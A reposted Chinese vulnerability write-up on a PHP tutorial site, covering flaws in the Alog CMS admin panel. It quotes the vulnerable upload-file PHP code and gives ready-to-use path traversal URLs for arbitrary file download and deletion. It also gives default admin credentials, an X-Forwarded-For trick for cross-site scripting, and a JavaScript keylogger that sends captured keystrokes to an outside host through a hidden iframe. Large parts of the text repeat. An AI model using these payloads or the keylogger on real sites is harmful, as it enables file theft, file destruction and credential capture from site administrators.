来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 后台 任意下载 任意删除 任意列目录漏洞文件:admin/mod/uploadfile.mod.php$baseDir = SITE_ROOT.#39;static/upload/#39;;$currentDir = $_GET[#39;dir#39;] ? $_GET[#39;dir#39;] : ($_POST[......
|
后台 任意下载 任意删除 任意列目录
漏洞文件:admin/mod/uploadfile.mod.php
$baseDir = SITE_ROOT.'static/upload/';
$currentDir = $_GET['dir'] ? $_GET['dir'] : ($_POST['dir'] ? $_POST['dir'] : ''); //没有任何过滤
$currentPath = $baseDir.$currentDir;
任意下载
$uploadfile = $_GET['uploadfile'] ? $currentPath.'/'.$_GET['uploadfile'] : $currentPath;
//$_GET['uploadfile']文件名称没有经常任何安全过滤
if (@is_file($uploadfile)) //如果文件存在即刻下载
{
$fileName = basename($uploadfile);
$fileNameInfo = explode('.', $fileName);
$fileType = $filename_info[count($fileNameInfo) - 1];
header('Content-type: application/x-'.$fileType);
header('Content-Disposition: attachment; filename='.$fileName);
header('Content-Description: PHP3 Generated Data');
readfile($uploadfile);
exit;
}
EXP
http://localhost/upload/admin/index.php?m=uploadfile&a=download&dir=advertisiment/../../../admin&uploadfile=index.php
http://www.2cto.com /upload/admin/index.php?m=uploadfile&a=delete&dir=&uploadfile=advertisiment/../../../2.php
http://localhost/upload/admin/index.php?m=login&a=login
http://localhost/upload/admin/index.php?m=login&a=login
userName=admin&password=admin&VCode=anqm&lang=zh-cn
遍历目录文件
留言板X-Forwarded-For 可以绕过导致跨站
Heads: X-Forwarded-For:192.168.1.1
Alog CMS
后台 任意下载 任意删除 任意列目录
漏洞文件:admin/mod/uploadfile.mod.php
$baseDir = SITE_ROOT.'static/upload/';
$currentDir = $_GET['dir'] ? $_GET['dir'] : ($_POST['dir'] ? $_POST['dir'] : ''); //没有任何过滤
$currentPath = $baseDir.$currentDir;
任意下载
$uploadfile = $_GET['uploadfile'] ? $currentPath.'/'.$_GET['uploadfile'] : $currentPath;
//$_GET['uploadfile']文件名称没有经常任何安全过滤
if (@is_file($uploadfile)) //如果文件存在即刻下载
{
$fileName = basename($uploadfile);
$fileNameInfo = explode('.', $fileName);
$fileType = $filename_info[count($fileNameInfo) - 1];
header('Content-type: application/x-'.$fileType);
header('Content-Disposition: attachment; filename='.$fileName);
header('Content-Description: PHP3 Generated Data');
readfile($uploadfile);
exit;
}
EXP
http://localhost/upload/admin/index.php?m=uploadfile&a=download&dir=advertisiment/../../../admin&uploadfile=index.php
http://localhost/upload/admin/index.php?m=uploadfile&a=delete&dir=&uploadfile=advertisiment/../../../2.php
http://localhost/upload/admin/index.php?m=login&a=login
http://localhost/upload/admin/index.php?m=login&a=login
userName=admin&password=admin&VCode=anqm&lang=zh-cn
遍历目录文件
留言板X-Forwarded-For 可以绕过导致跨站
Heads: X-Forwarded-For:192.168.1.1
跨站协助删除后台文件
获取后台路径监视输入字符
1.js
var keys; //保存键盘记录
var key;
document.onkeypress = function(e) { //劫持键盘消息函数
get = window.event ? event:e;//创建事件对象
key = get.keyCode ? get.keyCode : get.charCode;
switch(key){
case 32 : key = '[Space]';break;
case 13 : key = '[Enter]';break;
default :
key = String.fromCharCode(key);
keys += key;
//alert(key+"||"+keys);
}
跨站协助删除后台文件
获取后台路径监视输入字符
1.js
var keys; //保存键盘记录
var key;
document.onkeypress = function(e) { //劫持键盘消息函数
get = window.event ? event:e;//创建事件对象
key = get.keyCode ? get.keyCode : get.charCode;
switch(key){
case 32 : key = '[Space]';break;
case 13 : key = '[Enter]';break;
default :
key = String.fromCharCode(key);
keys += key;
//alert(key+"||"+keys);
}
}
function f()
{
$url=escape(window.location.pathname);
ifm=document.createElement("IFRAME");
document.body.appendChild(ifm);
ifm.width=0;
ifm.height=0;
ifm.src="http://localhost/upload/7.php?x="+$url+"//"+keys;
}
window.setInterval(f,5000)
//setTimeout(f,"1000");
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
